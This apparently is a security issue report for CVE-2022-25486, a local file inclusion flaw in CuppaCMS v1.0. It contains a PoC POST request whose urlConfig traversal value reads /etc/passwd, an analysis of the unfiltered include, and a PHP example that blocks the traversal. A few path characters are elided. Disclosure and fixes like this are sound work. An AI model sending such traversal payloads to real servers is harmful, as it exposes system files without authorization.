
CVE-2022-25486: Unauthorized local file inclusion (LFI) vulnerability exists via the urlConfig parameter in /alerts/alertConfigField.php · Issue #25 · CuppaCMS/CuppaCMS

CuppaCMS v1.0 was discovered to contain a local file inclusion via the url parameter in /alerts/alertConfigField.php.


Product version: cuppaCMS v1.0 http://cuppacms.com/files/cuppa_cms.zip

PoC

POST /alerts/alertConfigField.php
urlConfig=../../../../../../../../../../../../../../etc/passwd

Analysis

Location: /alerts/alertConfigField.php, line 77

    <?php include "…/components/table_manager/fields/config/".@$cuppa->POST("urlConfig"); ?>

and $cuppa->POST is:

    // post
    public function POST($string){
        return $this->sanitizeString(@$_POST[$string]);
    }

Going on to sanitizeString:

    public function sanitizeString($string){
        return htmlspecialchars(trim(@$string));
    }

So the POST parameter urlConfig is used without any LFI protection filter.

Repair suggestions

You can check urlConfig; for example, check if it has … and, if so, refuse the request.
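
One way to implement such a check, as an added example that is not CuppaCMS code or part of the original issue: resolve the requested name with realpath() and include it only if the result stays inside the field-config directory. The helper name resolveConfigInclude, the temporary directory tree and the sample inputs are assumptions constructed for the demonstration; the loop applies the same htmlspecialchars(trim()) transform as sanitizeString to show that it leaves the traversal sequence untouched.

```php
<?php
declare(strict_types=1);

// Hypothetical helper, not CuppaCMS code: map a user-supplied config name to a
// file inside $baseDir, or return null when the request must be refused.
function resolveConfigInclude(string $baseDir, string $name): ?string
{
    $base = realpath($baseDir);
    if ($base === false || $name === '' || strpos($name, "\0") !== false) {
        return null;
    }
    // realpath() collapses "../" segments and symlinks; false if the file is missing.
    $target = realpath($base . DIRECTORY_SEPARATOR . $name);
    if ($target === false || !is_file($target)) {
        return null;
    }
    // Containment check; the trailing separator stops "/config_old" matching "/config".
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($target, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    // Only PHP files are expected in the field-config directory (assumption).
    return pathinfo($target, PATHINFO_EXTENSION) === 'php' ? $target : null;
}

// Constructed demo tree standing in for components/table_manager/fields/config/.
$root = sys_get_temp_dir() . '/lfi_demo_' . bin2hex(random_bytes(4));
mkdir("$root/config", 0700, true);
file_put_contents("$root/config/text.php", "<?php // field config\n");
file_put_contents("$root/secret.txt", "outside the config directory\n");

// Constructed sample inputs; the third is the value from the PoC above.
$samples = ['text.php', '../secret.txt',
    '../../../../../../../../../../../../../../etc/passwd', 'missing.php'];
foreach ($samples as $input) {
    // Same transform as sanitizeString(): "../" passes through unchanged.
    $sanitized = htmlspecialchars(trim($input));
    $resolved  = resolveConfigInclude("$root/config", $sanitized);
    printf("%s => %s\n", $sanitized,
        $resolved === null ? 'REFUSED' : 'include ' . $resolved);
}

// Remove the constructed demo tree.
unlink("$root/config/text.php");
unlink("$root/secret.txt");
rmdir("$root/config");
rmdir($root);
```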
